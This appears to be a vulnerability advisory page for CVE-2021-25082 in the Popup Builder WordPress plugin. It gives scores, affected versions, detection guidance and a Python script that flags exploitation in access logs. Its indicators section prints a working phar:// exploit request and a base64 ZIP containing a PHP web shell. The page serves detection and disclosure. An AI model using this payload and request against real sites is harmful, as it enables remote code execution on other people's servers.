cbcvebase.
CVE-2021-25082
published 2022-02-21


Priority: P276 high
CVSS 3.1: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Exploit status: ITW EXPLOIT; VulnCheck KEV; exploited in the wild
EPSS: 5.37% (91.6th percentile)
The Popup Builder WordPress plugin before 4.0.7 does not validate and sanitise the sgpb_type parameter before using it in a require statement, leading to a Local File Inclusion issue. Furthermore, since the beginning of the string can be controlled, the issue can lead to an RCE vulnerability via wrappers such as PHAR.

Affected

1 range

Vendor    Product         Version range   Fixed in
sygnoos   popup_builder   < 4.0.7         4.0.7

Detection & IOCs (extracted from sources)

filename: Popup.php
command: /?sgpb_type=phar://wp-content/uploads/{{upload_year}}/{{upload_month}}/malicious.zip/&cmd=echo%20{{marker}}
bytes (base64): UEsDBAoAAAAAAHINkVuOOgt7HwAAAB8AAAAJABwAUG9wdXAucGhwVVQJAAPHCkJpxwpCaXV4CwABBAAAAAAEAAAAADw/cGhwIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/PgpQSwECHgMKAAAAAAByDZFbjjoLex8AAAAfAAAACQAYAAAAAAABAAAApIEAAAAAUG9wdXAucGhwVVQFAAPHCkJpdXgLAAEEAAAAAAQAAAAAUEsFBgAAAAABAAEATwAAAGIAAAAAAA==
  • Look for GET requests to the WordPress root with the 'sgpb_type' parameter containing a 'phar://' wrapper, which is the exploitation vector for this LFI/RCE vulnerability.
  • Monitor for authenticated file uploads of ZIP archives to /wp-admin/async-upload.php followed shortly by requests using the 'sgpb_type' parameter referencing the uploaded file path via phar:// wrapper.
  • Detect the 'sgpb_type' parameter in HTTP requests containing path traversal or wrapper strings (e.g., 'phar://', 'php://') as indicators of exploitation attempts.
  • Check for the cookie 'wordpress_logged_in' in conjunction with the above upload and exploitation requests, as the attack requires authenticated access.
  • Exploitation requires the attacker to be authenticated (subscriber-level or higher) to upload the malicious ZIP file via the WordPress media uploader before triggering the PHAR wrapper via sgpb_type.
  • The vulnerability can be escalated from LFI to RCE only when the attacker can upload a PHAR-compatible archive (e.g., ZIP) to the server, which is possible via the WordPress media upload functionality for authenticated users.
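The detection bullets above describe three signals: an sgpb_type parameter carrying a stream wrapper or traversal string, a preceding authenticated ZIP upload to /wp-admin/async-upload.php from the same client, and the wordpress_logged_in cookie. The following added example (not from the page or the plugin vendor) runs all three over constructed web-server access-log lines. It assumes a combined-style log with the request cookie appended as one extra quoted field; the IPs, timestamps and cookie name suffix in the sample are constructed, and the ten-minute correlation window is an assumption to tune per site.

```python
"""Access-log detection for CVE-2021-25082 (Popup Builder sgpb_type LFI / PHAR RCE).

Constructed example: log format is combined + one trailing quoted Cookie field.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"(?: "(?P<cookie>[^"]*)")?$'
)
# Stream wrappers and traversal that should never appear in sgpb_type.
WRAPPER_RE = re.compile(r'(phar|php|data|zip)://|\.\./', re.IGNORECASE)
UPLOAD_PATH = "/wp-admin/async-upload.php"
CORRELATION_WINDOW = timedelta(minutes=10)  # assumption; tune per site

# Constructed sample log: an upload, the matching phar:// request, a benign
# sgpb_type value, and an unrelated request.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Feb/2022:10:01:02 +0000] "POST /wp-admin/async-upload.php HTTP/1.1" 200 512 "-" "Mozilla/5.0" "wordpress_logged_in_abc=alice"',
    '203.0.113.7 - - [21/Feb/2022:10:02:15 +0000] "GET /?sgpb_type=phar://wp-content/uploads/2022/02/malicious.zip/&cmd=echo%20marker HTTP/1.1" 200 128 "-" "Mozilla/5.0" "wordpress_logged_in_abc=alice"',
    '198.51.100.4 - - [21/Feb/2022:10:03:00 +0000] "GET /?sgpb_type=popup HTTP/1.1" 200 2048 "-" "Mozilla/5.0" "-"',
    '198.51.100.9 - - [21/Feb/2022:10:04:00 +0000] "GET /blog/?p=12 HTTP/1.1" 200 4096 "-" "Mozilla/5.0" "-"',
]


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    event = m.groupdict()
    event["ts"] = datetime.strptime(event["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return event


def sgpb_type_values(path):
    """Return the percent-decoded sgpb_type values in the query string."""
    qs = parse_qs(urlsplit(path).query, keep_blank_values=True)
    return qs.get("sgpb_type", [])


def classify(event):
    """Label a parsed request: wrapper/traversal, plain sgpb_type, or None (benign)."""
    values = sgpb_type_values(event["path"])
    if not values:
        return None
    if any(WRAPPER_RE.search(v) for v in values):
        return "sgpb_type_wrapper_or_traversal"
    return "sgpb_type_present"


def severity(label, preceded_by_upload, authenticated):
    """Wrapper use plus an upload or a login cookie is the full attack chain."""
    if label != "sgpb_type_wrapper_or_traversal":
        return "low"
    return "high" if (preceded_by_upload or authenticated) else "medium"


def scan(lines):
    """Scan log lines in order; correlate sgpb_type hits with prior uploads per IP."""
    uploads = {}  # ip -> timestamps of POSTs to the media uploader
    findings = []
    for event in (parse_line(l) for l in lines):
        if event is None:
            continue
        if event["method"] == "POST" and urlsplit(event["path"]).path == UPLOAD_PATH:
            uploads.setdefault(event["ip"], []).append(event["ts"])
            continue
        label = classify(event)
        if label is None:
            continue
        preceded = any(timedelta(0) <= event["ts"] - t <= CORRELATION_WINDOW
                       for t in uploads.get(event["ip"], []))
        authed = "wordpress_logged_in" in (event.get("cookie") or "")
        findings.append({
            "ip": event["ip"],
            "ts": event["ts"].isoformat(),
            "label": label,
            "preceded_by_upload": preceded,
            "authenticated_cookie": authed,
            "severity": severity(label, preceded, authed),
        })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Run against the sample, the phar:// request from 203.0.113.7 is reported as high because it follows an upload from the same address within the window and carries the login cookie, while the plain `sgpb_type=popup` request is reported as low for triage. Requests that never mention sgpb_type produce nothing.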

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      8.8     HIGH       CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd         v2.0      6.5     MEDIUM     AV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck   -         8.8     HIGH       -